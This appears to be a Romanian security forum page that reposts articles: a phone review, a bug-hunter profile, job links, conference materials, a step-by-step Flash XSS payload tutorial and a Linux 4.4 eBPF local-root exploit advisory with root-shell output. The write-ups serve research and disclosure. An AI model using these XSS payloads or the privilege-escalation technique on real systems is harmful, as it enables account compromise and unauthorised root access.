Nytro

Interesant, cred... Util? Posibil. Banuiesc ca se poate implementa in engine-urile antivirusilor pentru heuristica.

Pe scurt, pentru toti: http://blog.erratasec.com/2016/06/etheriumdao-hack-similfied.html#.V2eZVLh96Uk

Veit Hailperin, The Tale of a Fameless but Widespread Web Vulnerability Class - Security Fest 2016 Publicat pe 16 iun. 2016 Veit Hailperin is a security researcher and consultant at scip AG. They are based in Zürich, Switzerland with clients covering a wide range, from non-profit organizations and governmental agencies to banks and insurance companies. His research interests are focused on network and application layer security. Title: The Tale of a Fameless but Widespread Web Vulnerability Class Two keys components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly wide spread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI.

Mda, un script profesional ar trebui sa functioneze si fara JS. Nu cred ca am ce sa fac in aceasta privinta.

Nu prea mai avem timp de forum, cel putin eu... Nu vad de ce nu se poate inregistra cineva folosind Tor. Nu reusesc Guvernele sa opreasca Tor si reusim noi?

Incearca cu file:// sa citesti de pe disk.

Shit happens. Stie cineva cum au reusit?

Implementing an Obsolete VPN Protocol on Top of HTTP: Because Why Not? Posted by Niklaus Schiess Recently I’ve started some research on MikroTik’s RouterOS, the operating system that ships with RouterBOARD devices. As I’m running such a device myself, one day I got curious about security vulnerabilities that have been reported on the operating system and the running services as it comes with tons of features. Searching for known vulnerabilities in RouterOS on Google doesn’t really yield a lot of recent security related stuff. So I thought, there is either a lack of (public) research or maybe it is super secure… Not really satisfied with the outcome of my research about previous research one day I thought I give it a shot and just take a quick look at the management interfaces, mainly the web interface. As it turns out, there could be a third explanation for the lack of security related search results on Google: obfuscation. The communication of the web interface is obfuscated, most likely encrypted, which may discourages researchers that just came around to search for low hanging fruits. RouterOS WebFig RouterOS is a proprietary operating system for routers, based on Linux. It is available for various architectures, including x86. It can be downloaded directly from the vendor’s page and is usable for a couple of days without buying a license, which makes it really nice for researching. RouterOS provides different interfaces for device management: Winbox is a native application for Windows WebFig is a web interface Access to a Cisco-like shell via SSH/Telnet An API that is not enabled by default This blog post will cover the WebFig interface running on TCP port 80. By default there is no HTTPS interface available (which would lead to using untrusted certificates anyway). However, the release notes of RouterOS 5.5 state: “webfig – encrypt whole session even in non https mode;”. Here it becomes quite interesting. The question is: how are they actually encrypting HTTP traffic without using SSL/TLS? I’ve fired up Burp and started to inspect the HTTP request of WebFig. Articol complet: https://www.insinuator.net/2016/05/implementing-an-obsolete-vpn-protocol-on-top-of-http-because-why-not/

Sirin Labs launches ultra-secure, ultra-expensive Solarin smartphone It's the 'best' and 'most secure' phone ever made, its maker claims. By Charles McLellan for Product Central | May 31, 2016 -- 20:40 GMT (21:40 BST) | Topic: Smartphones Sirin Labs' co-founders Kenes Rakishev, Moshe Hogeg and Tal Cohen launch the Solarin smartphone in London. Image: Charles McLellan/ZDNet If you're a startup launching into the hyper-competitive smartphone market, then -- as well as plenty of funding and nerves of steel -- you'll need to target a sector with room for yet another vendor. Sirin Labs, co-founded in 2013 by Kenes Rakishev (chairman), Moshe Hogeg (president) and Tal Cohen (CEO), is funded to the tune of $72 million (£49.6m) and launched its first product,Solarin -- which Hogeg confidently described as "the best phone ever made, and for sure the most secure phone ever made" -- in central London today. Solarin is also one of the most expensive smartphones ever made, starting at £9,500/$14,800 plus taxes. Despite its price, the 5.5-inch Android-based Solarin is largely free of 'bling'-style decoration. Image: Sirin Labs Of course, expensive smartphones are available from the likes of Vertu, and secure ones from Silent Circle and others, so Sirin Labs isn't exactly entering virgin territory. But if you're a business leader, entrepreneur or financier with a lot of confidential information, a lot of communication needs, and the wherewithal to drop ten grand (sterling) on a phone, then Sirin Labs thinks you're a potential customer. Despite its price, Solarin isn't an over-decorated 'bling' phone. Indeed, this Swedish-designed-and-built Android (5.1) handset looks relatively restrained. It packs a decent, if not always cutting-edge, specification, including: A 2GHz Qualcomm Snapdragon 810 octa-core SoC with 4GB of RAM and 128GB of internal storage; A 5.5-inch Gorilla Glass 4-protected IPS LCD with 2,560 by 1,440 resolution (538ppi), delivering 120 percent of the sRGB colour gamut, 1,500:1 typical contrast ratio and 600cd/m2 typical brightness; A 24-megapixel main camera with laser autofocus, quad-tone flash, optical image stabilisation and 4k video recording at 30fps, plus an 8-megapixel front camera with flash, electrical image stabilisation and HD video recording at 60fps; An audio subsystem comprising three bass-boosted speakers and four microphones, plus a smart amplifier designed to maximise volume while minimising distortion; Support for 24 LTE bands, 802.11ac wi-fi with 2x2 MU-MIMO and 60GHz WiGig; and A 4,040mAh li-ion battery with claimed talk time of 31 hours (UMTS), standby time of 'over 2 weeks' and Qualcomm QuickCharge 2.0 support "Whenever you see something in our spec that isn't the latest, there's a very good reason for that," said CEO Tal Cohen at the launch, citing the 2k screen's combination of brightness, colour gamut and power consumption as an advantage over a 4k screen as an example. The Solarin measures 78mm wide by 159.8mm deep by 11.1mm thick, weighs 243g, is water/dust resistant to IP54 level and comes in Fibre Black Carbon Titanium, Fibre Black Carbon DLC, Fibre Black Carbon Yellow Gold and Crystal White Carbon DLC variants. Security Solarin's Security Shield mode offers hardware-based, end-to-end encrypted VoIP calls and messages. Image: Charles McLellan/ZDNet Security is Sirin Labs' main focus, and its solution for the Solarin phone comprises three main elements: Mobile threat protection from Zimperium, offering continuous protection against network, host-based and physical attacks; Encrypted email powered by ProtonMail, which combines public-key cryptography with symmetric encryption protocols to offer end-to-end encryption via a 2-password system; and Security Shield from KoolSpan, which enables hardware-based, end-to-end encrypted VoIP calls and messages using military-grade AES-256, FIPS 140-2 encryption. Security Shield mode is activated via a sliding Security Switch above the camera lens (diamond-inlaid, naturally), which also shuts down unnecessary operations on the phone. Is Sirin Labs' Solarin the best and most secure phone ever made, as co-founder and president Moshe Hogeg claims? Given the price, it'll need to be, and we look forward to investigating further in a full review in due course. If that ten grand is burning a hole in your pocket, the Solarin is available online now, at Sirin Labs' store in London's Mayfair (34 Bruton Place) from 1 June, and from Harrods in Knightsbridge from 30 June. Update, June 2 2016 Vertu is the best-known name in the 'luxury technology' market, and ZDNet asked CEO Gordon Watson for his reactions to Sirin Labs' Solarin launch: "Vertu is always interested to see new entrants in the luxury technology space and we welcome competition to the market. While that category has had many players over the years, Vertu has often been a lone voice within it. However, while the luxury technology category is growing, competing within it is tough, particularly with high-end or luxury mobile phones. Vertu has been honing its business for 18 years and continues to innovate in order to keep pace with changes in both the technology and luxury industries," said Watson. On the Solarin phone's emphasis on security and design/build quality rather than overtly luxurious features, Watson had this to say: "At this stage we've not seen the product first hand, so it would be impossible to judge it fairly. Vertu's smartphone products have been the brand's best sellers over the last three years and these combine leading-edge technology, precision-engineered build and a suite of personalised and curated services -- the combination of these three elements are vital to Vertu and allow us to offer a unique proposition." "We also believe that e-commerce, a global retail network and strong after-sales care add significantly to the consumer experience. Security has been a fundamental of the Vertu brand since the launch of its Signature S model in 2002 and the company continues to work closely with in-house security experts as well as external partners -- not least Google -- to ensure that customers are fully protected." And on Vertu's roadmap: "Vertu switched investment partners in the last quarter of 2015, moving to a team with knowledge of both the technology industry and the evolving Asian luxury market. The benefits of this new investment and expertise will be seen with a series of product launches in the latter part of 2016 and beyond." Sursa: http://www.zdnet.com/article/sirin-labs-launches-ultra-secure-ultra-expensive-solarin-smartphone/

25 MAY 2016 on security Over the years I found a lot of cross-site scripting vulnerabilities in flash files (recognizable by the .swf extension). Finding cross-site scripting vulnerabilities in flash files is some sort of a hobby for me because it almost always succeeds. It's pretty obvious that the awareness of cross-site scripting vulnerabilities is even lower than those of PHP developers. To start, unfortunately you can't do "right mouse click, view-source" on a flash file but fortunately there are a couple of tools that can do it for you. For example http://www.showmycode.com/. A large list of tools can be found here: http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html To demonstrate how I analyze a flash file I'm going use the banner.swf file and the zeroclipboard.swf cross-site scripting for example of which the banner.swf is a commonly known mistake and the zeroclipboard.swf file is a known vulnerable flash file that has been made public in 2012 on Github (https://github.com/zeroclipboard/zeroclipboard/issues/14). banner.swf This vulnerability is pretty basic. When the clicktag function in Actionscript allows unfiltered user input it can used to inject javascript url's for example javascript:alert(1). The getUrl function is used a lot and is often poorly filtered or not filtered at all. An example of a vulnerable flash file decompiled via showmycode: on (release) { geturl (_root.clickTAG, "_self"); } on (release) is a trigger that execute a code when the mouse is pressed and _root.clickTAG stands for the clickTAG parameter which is not escaped or what so ever and is therefor vulnerable for cross-site scripting attacks. The vulnerability could be reproduced by going to the following these steps: Go to banner.swf?clickTAG=javascript:alert(1) A press on the page (anywhere in this case) zeroclipboard.swf Zeroclipboard is a library used to modify the users clipboard often used to provide a "copy to clipboard" functionality. This vulnerability is a bit more complex than the banner.swf. Huge companies like coindesk and Yahoo were vulnerable for this vulnerability so for me it's pretty interesting to know where this issue originated from. To start our search we need a vulnerable zeroclipboard file. A mirror of the vulnerable version can be downloaded here:http://github.com/cure53/Flashbang/raw/master/flash-files/files/ZeroClipboard.swf I decompiled the source using showmycode: package { import flash.events.*; import flash.display.*; import flash.external.*; import flash.system.*; import flash.utils.*; public class ZeroClipboard extends Sprite { private var button:Sprite; private var id:String = ""; private var clipText:String = ""; public function ZeroClipboard(){ super(); stage.scaleMode = StageScaleMode.EXACT_FIT; Security.allowDomain("*"); var flashvars:* = LoaderInfo(this.root.loaderInfo).parameters; id = flashvars.id; button = new Sprite(); button.buttonMode = true; button.useHandCursor = true; button.graphics.beginFill(0xCCFF00); button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); button.alpha = 0; addChild(button); button.addEventListener(MouseEvent.CLICK, clickHandler); button.addEventListener(MouseEvent.MOUSE_OVER, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOver", null); }); button.addEventListener(MouseEvent.MOUSE_OUT, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOut", null); }); button.addEventListener(MouseEvent.MOUSE_DOWN, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseDown", null); }); button.addEventListener(MouseEvent.MOUSE_UP, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseUp", null); }); ExternalInterface.addCallback("setHandCursor", setHandCursor); ExternalInterface.addCallback("setText", setText); ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null); } public function setHandCursor(_arg1:Boolean){ button.useHandCursor = _arg1; } private function clickHandler(_arg1:Event):void{ System.setClipboard(clipText); ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); } public function setText(_arg1){ clipText = _arg1; } } }//package The function we are searching for is ExternalInterface.call. This function is used to call JavaScript functions from flash files and it's unreliable. When unfiltered input is passed to this function it's possible to inject your own JavaScript. A quick search for ExternalInterface.call returned: ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); What we have to do now is find out how this function get's triggered. The example I used sits within a function called clickHandler so I did a quick search for clickHandler and found that it get's triggered when there is a click on a element named "button". What is button? Well, button = new Sprite(); which is a class used for user interface components. Let's take a look at the part where the sprite is created: button = new Sprite(); button.buttonMode = true; button.useHandCursor = true; button.graphics.beginFill(0xCCFF00); button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); button.alpha = 0; addChild(button); By looking at this part you might already have noticed the 5th line. button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); This part determines the width and height of the button sprite by using two variables. flashvars.width and flashvars.height. To find out where this parameters are set we don't have to look very far. By searching for flashvarsit's pretty easy to find out that flashvars stands for LoaderInfo(this.root.loaderInfo).parameters; which is used to get the parameters from a request. So, to set the width and height from the button element we have to add two parameters to the zeroclipboard.swf file in the url. Now, when the mouse is hovered over the button the function clickHandler will be called which triggers our vulnerable part of code that we want to reach. /zeroclipboard.swf?width=1000&height=1000 Now we have to exploit the vulnerable part of code, let's get back to the vulnerable line: ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); The id variable actually is user input, you can see that by searching for the id variable. In the code you will find id = flashvars.id; So, now we know that the variable id can be set by requesting the flash file with the parameter id (I almost could have guessed it..) To turn this into a cross-site scripting we first have to know how ActionScript generates the JavaScript code for the ExterinalInterface.call The code looks like this: try { __flash__toXML(ZeroClipboard.dispatch("USER INPUT HERE","load",null)) ; } catch (e) { "<undefined/>"; } User input is located at "USER INPUT HERE" so there is where we should try to break out. First we need to get out of the double quotes. We can't just do this by typing "because ActionScript does escape this input. Luckily it can be escaped by adding a backslash in front of it. So our payload needs to start with \". This will turn the generated JavaScript into: try { __flash__toXML(ZeroClipboard.dispatch("\\"","load",null)) ; } catch (e) { "<undefined/>"; } All we have to do now is inject our own script and make sure that it's valid JavaScript. First, let's add two forward slashes at the end of our payload. By adding two forward slashes at the end of our payload JavaScript will see everything behind it as a command try { __flash__toXML(ZeroClipboard.dispatch("\\"//","load",null)) ; } catch (e) { "<undefined/>"; } Because we shopped of the end of the function it now looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\" This is invalid JavaScript but we can fix that! Let's start by ending two the functions ZeroClipboard.dispatch and __flash__toXML Our payload now looks like this: \"))// and the generated JavaScript looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\")) Now we have to end the try statement, we do this by using } catch(e) {} Our payload now looks like this: \"))} catch(e) {}// and the generated JavaScript looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\"))} catch(e) {} This is perfectly valid JavaScript, all we have to do now is inject our payload. We can add the payload (for example, an alert) in the catch statement like this: \"))} catch(e) {alert(1);}// which makes the final url: /zeroclipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 List of known vulnerable flash files I started a public spreadsheet where everybody can contribute to make a list of vulnerable SWF files. You can contribute to the list here: https://docs.google.com/spreadsheets/d/1zWc4Sf0pk_6lDVG0Lm-SjFbVVR8hY5X9WoKJNPhGWCs The list Flashbang An awesome tool that can help you to find vulnerabilities in flash files is flashbang. It can be found here: https://cure53.de/flashbang. It's created by cure53 (obviously) and it's even open source on Github available here:https://github.com/cure53/Flashbang Resources http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/ https://github.com/DBA/swf_file https://github.com/cure53/Flashbang https://github.com/zeroclipboard/zeroclipboard/issues/14 http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html smiegles Read more posts by this author. Sursa: https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/

E o buna promovare pentru tara noastra. E povestea cuiva care munceste si care e recunoscut de catre multe companii. Normal, nu e singurul care se ocupa cu asa ceva si care o face bine, dar este unul dintre ei.

E freelancing. E pasiune. It's a way of life.

The Romanian Teen Hacker Who Hunts Bugs to Resist the Dark Side IT’S 3 AM, and his eyes are almost closed. The pack of gummy bears on his desk is empty. So’s the Chinese takeout box. Romanian white hat hacker Alex Coltuneac has had three hours of sleep tonight. And last night. And the night before that. He’s busy trying to find a vulnerability in YouTube live chat, which he plans to report to the company and hopefully get some money in return. None of the bugs he has discovered in the past few days electrifies him, so he keeps digging. In the past four years, Coltuneac has gotten bug bounty payments from Google, Facebook, Microsoft, Adobe, Yahoo, eBay, and PayPal for flaws he reported. Such bounty programs are a chance for Eastern European hackers like him to pursue a legitimate career in cybersecurity. And he’s only 19 years old. In a country better known for cybercrime, the teenager is part of small but growing cohort of hackers who are deciding to play it nice. This is a departure for the hacking community of Romania, known for such hits as the hackers Hackerville and Guccifer, and fraudsters who steal money from American bank accounts, perpetrate eBay frauds, and land themselves on the FBI’s most wanted list. Coltuneac is a freshman at the Babes-Bolyai University in Cluj-Napoca, where he learns Computer Science taught in English. Raised by a family who emphasized honest values, he started using a computer when his was 6. First, he taught himself how to play games, but as he got older he began to see the computer’s potential as a tool to make money. He spent his early teenage years watching fellow Romanian hackers make astounding sums of money selling exploits on the black market. They were able to rake in thousands of US dollars with just a few clicks, far more than Coltuneac’s parents made in a month. He was a good kid, from a good family. He didn’t want to join them. But he did want to pay for college. The allure of that life was powerful. Which is why he was so grateful to find out about bug bounty programs when he was 15. They pay enough to keep his conscience clear and his bank account full. Bounties cover the cost his education and living expenses, so “there’s no excuse to break the law,” he said. Coltuneac won’t say how much he earns as a vulnerability hunter, yet gifted white hat hackers doing the same kind of job brag about making in a lucky month about $6,000. That’s how much an ordinary Romanian earns in a year. The average take home pay in the country was about $520 a month this March, one of the lowest in the European Union. On the white market, a flaw found and reported legitimately is priced at a few hundred dollars, enough for Coltuneac to pay his rent this month. Sensitive ones are often rewarded with several thousand dollars. In very few cases, the bounty exceeds $100,000. He’s constantly hoping to find one of those. And that sum is still far less than what he would get if he sold the same vulnerabilities on the gray or black markets. (Gray markets sell exploits to nations and corporations to use against their foe; black markets sell to the highest bidder, often criminals.) Zerodium, a gray hat vulnerability broker working with law enforcement and intelligence agencies, awards a hacker up to $500,000 for a high-risk bug with fully functional exploit. Patching Giants Coltuneac started hunting vulnerabilities when he was 15, after visiting a Romanian cybersecurity forum, in his free time after school. Like most Romanian hackers, the teen is self taught. Soon, he got his first few hundred dollars from Google, and used them to buy himself a brand new computer. His desktop was dead slow. “I got lucky. I found a sensitive file. I used brute force,” he said. The tech giant is among the companies he closely monitors for bug bounty programs. He has recently found an LFI vulnerability and several XSS flaws in Google FeedBurner. Last year alone, Google awarded over $2 million to security researchers globally, and since 2010, when it began its bug bounty program, it has paid a total of $6 million. For 2015, Google highlighted Romania as among the top countries bug bounties were paid out to. Coltuneac has also made it to Microsoft’s Bounty Hunters: The Honor Roll. This spring he found an XSS vuln in their OAuth interface. Microsoft is constantly improving its bounty program, and last year, the company included rewards for flaws found in Azure, ASP.NET, .NET Core runtime and the Edge browser. Articol complet: https://www.wired.com/2016/05/romanian-teen-hacker-hunts-bugs-resist-dark-side/

Job-uri disponibile la inceputul verii: SecureWorks jobs: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/4894363 Penetration Tester - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/penetration-tester-87625 Technical Testing Tools Developer - Ruby on Rails & JavaScript - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-testing-tools-developer-ruby-javascript-88418 Vulnerability Specialist - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-specialist-85444 Solutions Architect Consultant - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/solutions-architect-consultant-secureworks-bucharest-89440 Linux System Administrator - SecureWorks: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/linux-system-administrator-secureworks-89426 Junior Linux Administrator - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-linux-administrator-secureworks-bucharest-89427 Information Security Specialist - Rotating Shifts - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-senior-analyst-rotating-shifts-86359 Local IT Support - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/deskside-technician-85137 Network Engineering Specialist - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineering-specialist-85077 Network Engineer - Telecom - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineer-telecom-85891 Information Security Risk Management Advisor - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-risk-management-advisor-secureworks-bucharest-89300 SharePoint Designer - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/sharepoint-designer-secureworks-bucharest-89716 Dell jobs: Technical Support Agent - English: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-support-agent-english-86798 Critical Incident Consultant: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/critical-incident-consultant-88525 Windows System Administrator: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-86347 Information Security Team Leader: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-team-leader-86413 Network Security Engineer - Firewall: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-engineer-firewall-87655 Senior IT Manager: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-it-manager-86956 Vulnerability Consultant: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-consultant-88299 Daca aveti intrebari, astept un PM.

Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free Local Root Exploit In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. These conditions are fulfilled in Ubuntu 16.04. When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up pointers for the corresponding map files. This is done as follows: /* look for pseudo eBPF instructions that access map FDs and * replace them with actual map pointers */ static int replace_map_fd_with_map_ptr(struct verifier_env *env) { struct bpf_insn *insn = env->prog->insnsi; int insn_cnt = env->prog->len; int i, j; for (i = 0; i < insn_cnt; i++, insn++) { [checks for bad instructions] if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) { struct bpf_map *map; struct fd f; [checks for bad instructions] f = fdget(insn->imm); map = __bpf_map_get(f); if (IS_ERR(map)) { verbose("fd %d is not pointing to valid bpf_map\n", insn->imm); fdput(f); return PTR_ERR(map); } [...] } } [...] } __bpf_map_get contains the following code: /* if error is returned, fd is released. * On success caller should complete fd access with matching fdput() */ struct bpf_map *__bpf_map_get(struct fd f) { if (!f.file) return ERR_PTR(-EBADF); if (f.file->f_op != &bpf_map_fops) { fdput(f); return ERR_PTR(-EINVAL); } return f.file->private_data; } The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If __fget_light() detected that the file descriptor table is shared with another task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause the reference count of the struct file to be over-decremented, allowing an attacker to create a use-after-free situation where a struct file is freed although there are still references to it. A simple proof of concept that causes oopses/crashes on a kernel compiled with memory debugging options is attached as crasher.tar. One way to exploit this issue is to create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file's writability, then free the writable file and open a readonly file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to write data to a readonly file. By e.g. writing to /etc/crontab, root privileges can then be obtained. There are two problems with this approach: The attacker should ideally be able to determine whether a newly allocated struct file is located at the same address as the previously freed one. Linux provides a syscall that performs exactly this comparison for the caller: kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd). In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.) writev() calls do_writev(), which looks up the struct file * corresponding to the file descriptor number and then calls vfs_writev(). vfs_writev() verifies that the target file is writable, then calls do_readv_writev(), which first copies the struct iovec from userspace using import_iovec(), then performs the rest of the write operation. Because import_iovec() performs a userspace memory access, it may have to wait for pages to be faulted in - and in this case, it has to wait for the attacker-owned FUSE filesystem to resolve the pagefault, allowing the attacker to suspend code execution in the kernel at that point arbitrarily. An exploit that puts all this together is in exploit.tar. Usage: user@host:~/ebpf_mapfd_doubleput$ ./compile.sh user@host:~/ebpf_mapfd_doubleput$ ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. suid file detected, launching rootshell... we have root privs now... root@host:~/ebpf_mapfd_doubleput# id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user) This exploit was tested on a Ubuntu 16.04 Desktop system. Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7 Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552 Sursa: https://cxsecurity.com/issue/WLB-2016050014

Android-Security-Reference This is a reference guide for all things Android Security. I'm slowly moving my private notes over to this repo as It may help others Others may help me (by correcting / adding to the ref) Feel free to contribute! Tools Nav helper OctoTree TOC gen DocToc Sursa: https://github.com/doridori/Android-Security-Reference

Anti-Sandbox and Anti-Virtual Machine Tool (Turkish : https://github.com/AlicanAkyol/sems/blob/master/Readme_Turkish.md) ( Sha1 (sems.exe) : 06598E9948C2E256C871E66B5578D51A1886758F) Modern malwares are equipped with anti-analysis techniques in order to evade analysis. It is common for malwares to check for the presence of any virtualization environment, any malware analysis sandboxes or any analysis tools during runtime. sems is a tool which is created to help malware researchers by checking their environments for the signatures of any virtualization techniques, malware sandbox tools or well know malware analysis tools. sems is using the same techniques and looking for the same footprints that evasive malwares do in order to detect if it is running in a controlled environment. So it is useful for malware researchers to check if the analysis environment is inevasible. How it works? Virtual Machine Once the tool is run in a virtual machine(Virtualbox, Vmware, Qemu), it performs all the checks which are shown below and drops logs to the console about detected signatures until the "control" text is shown. In addition to that a separate .txt file with the finding name is created in the running directory for each detected signatures. Example; vboxBios.txt will be created for virtualbox bios signature. Malware Sandbox sems tool is sent to malware sandbox like any other malware samples and waited until the completion of analysis. Detected signatures can be seen in "File Operations" section of the sandbox report hence sems drops separate .txt files for each findings. Sursa: https://github.com/AlicanAkyol/sems

Link: https://conference.hitb.org/hitbsecconf2016ams/materials/ Name Last modified Size Description Parent Directory - CLOSING KEYNOTE - Sophia D Antoine - Hardware Side Channels in Virtualized Environments.pdf 2016-05-27 18:40 2.3M D1 COMMSEC - Elisabeth de Leeuw - Unformation in the Era of Hyper Connectivity.pdf 2016-05-26 18:03 2.5M D1 COMMSEC - Marc Newlin - Applying Regulatory Data to IoT RF Reverse Engineering.pdf 2016-05-26 15:59 5.7M D1 COMMSEC - Martin Knobloch - Don't Feed the Hippos.pdf 2016-05-26 16:00 18M D1 COMMSEC - Melanie Rieback - Pentesting ChatOps.pdf 2016-05-30 10:06 3.4M D1 COMMSEC - Nadav Markus and Gal De Leon - Exploiting GLIBC - Hacking Everything.pdf 2016-05-26 18:18 1.0M D1T1 - Jacob Torrey - Using the Observer Effect and Cyber Fengshui.pdf 2016-05-26 15:37 4.9M D1T1 - Lin Huang - Forcing a Targeted LTE Cellphone into an Eavesdropping Network.pdf 2016-05-26 18:00 1.7M D1T1 - Nick Biasini - Exploit Kits - Hunting the Hunters .pdf 2016-05-26 17:05 45M D1T1 - Radu Caragea - Peering into the Depths of TLS Traffic in Real Time.pdf 2016-05-26 15:09 1.1M D1T1 - Shengping Wang and Xu Liu - Escape From The Docker-KVM-QEMU Machine.pdf 2016-05-26 12:16 2.0M D1T1 - Tang Qing Hao - Virtualization System Vulnerability Discovery Framework.pdf 2016-05-26 11:50 1.0M D1T2 - Broderick Aquilino and Wayne Low - Kernel Exploit Hunting and Mitigation.pdf 2016-05-26 15:10 1.4M D1T2 - Chilik Tamir - Profiting from iOS Malware.pdf 2016-05-26 15:37 27M D1T2 - Michele Spagnuolo and Lukas Weichselbaum - CSP Oddities.pdf 2016-05-26 12:31 1.6M D1T2 - Seunghun Han - Create Your Own Bad USB Device.pdf 2016-05-26 17:00 3.5M D1T2 - Tim Xia - Adaptive Android Kernel Live Patching.pdf 2016-05-26 18:20 2.4M D1T2 - Yann Allain and Julien Moinard - Hardsploit Project.pdf 2016-05-26 11:50 8.5M D1T3 - Gustavo Grieco - Vulnerability Discovery Using Machine Learning.pdf 2016-05-27 07:18 1.1M D1T3 LABS - Anto Joseph - Droid-FF.pdf 2016-05-26 12:31 30M D1T3 LABS - Tony Trummer and Tushar Dalvi - Mobile Application Security for iOS and Android.zip 2016-05-26 18:29 4.9M D2 COMMSEC - Antonio Martins - Inspecage - Android Pacakge Inspector.zip 2016-05-30 18:30 19M D2 COMMSEC - Barry van Kampen - Hack in The Class.pdf 2016-05-30 18:28 520K D2 COMMSEC - Mattijs van Ommeren - A Series Of Unfortunate Events - Where Malware Meets Murphy.pdf 2016-05-27 12:24 71M D2 COMMSEC - Paul Marinescu - Facebook Presents Capture the Flag.pdf 2016-05-30 10:17 6.3M D2T1 - Anders Fogh - Cache Side Channel Attacks.pdf 2016-05-27 13:52 432K D2T1 - Felix Wilhelm - Attacking Next Generation Firewalls.pdf 2016-05-27 15:59 2.9M D2T1 - Jun Li - CANSsee - An Automobile Intrusion Detection System.pdf 2016-05-27 18:39 5.5M D2T1 - Yuwei Zheng and Haoqi Shan - Forging a Wireless Time Signal to Attack NTP Servers.pdf 2016-05-27 12:26 6.9M D2T1 Itzik Kotler and Amit Klein - The Perfect Exfiltration Technique.pdf 2016-05-27 15:07 2.6M D2T2 - Mikhail Egorov and Sergey Soldatov - New Methods for Exploiting ORM Injections in Java Applications.pdf 2016-05-27 12:46 1.7M D2T2 - Peter blasty Geissler - Breaking Naive ESSID WPA2 Key Generation Algorithms.pdf 2016-05-27 18:39 8.4M D2T2 - Richard Johnson - Go Speed Tracer - Guided Fuzzing.pdf 2016-05-27 12:39 4.4M D2T2 - Shangcong Luan - Xen Hypervisor VM 